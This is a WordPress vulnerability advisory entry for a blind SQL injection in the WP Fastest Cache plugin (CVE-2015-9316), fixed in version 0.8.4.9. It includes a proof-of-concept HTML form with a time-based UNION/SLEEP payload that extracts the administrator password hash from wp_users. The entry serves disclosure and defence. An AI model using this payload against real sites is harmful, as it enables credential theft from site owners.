WP Fastest Cache <= 0.8.4.8 – Blind SQL Injection | CVE 2015-9316 | Plugin Vulnerabilities

Description

According to the researcher, for this vulnerability to be present WP-Polls plugin also needs to be installed.

Proof of Concept

<form method="post" action="http://wordpress-url/wp-admin/admin-ajax.php?action=wpfc_wppolls_ajax_request">
	<input type="text" name="poll_id" value="0 UNION (SELECT IF(substr(user_pass,1,1) = CHAR(36), SLEEP(5), 0) FROM `wp_users` WHERE ID = 1) -- ">
	<input type="submit" value="Send">
</form>

Affects Plugins

wp-fastest-cache

Fixed in 0.8.4.9

References

CVE

URL

https://security.szurek.pl/wp-fastest-cache-0848-blind-sql-injection.html

Classification

Type

SQLI

OWASP top 10

CWE

CVSS

Miscellaneous

Submitter

ethicalhack3r

Submitter twitter

Verified

No

WPVDB ID

7233f4ff-0e19-4902-a600-9346958f0eb2

Timeline

Publicly Published

2015-11-12 (about 10 years ago)

Added

2015-11-12 (about 10 years ago)

Last Updated

2026-04-13 (about 29 days ago)

Other

Published

Title

Published

2025-01-07

Title

Cost Calculator Builder PRO < 3.2.16 - Unauthenticated SQL Injection via data

Published

2021-10-25

Title

MainWP Child < 4.1.8 - Admin+ SQL Injection

Published

2024-08-26

Title

Greenshift Query and Meta Addon < 3.9.2 - Authenticated (Subscriber+) SQL Injection

Published

2023-03-22

Title

Waiting: One-click Countdowns <= 0.6.2 - Subscriber+ SQLi

Published

2016-11-10

Title

FireStorm Shopping Cart eCommerce Plugin 2.07.02 - Authenticated SQL Injection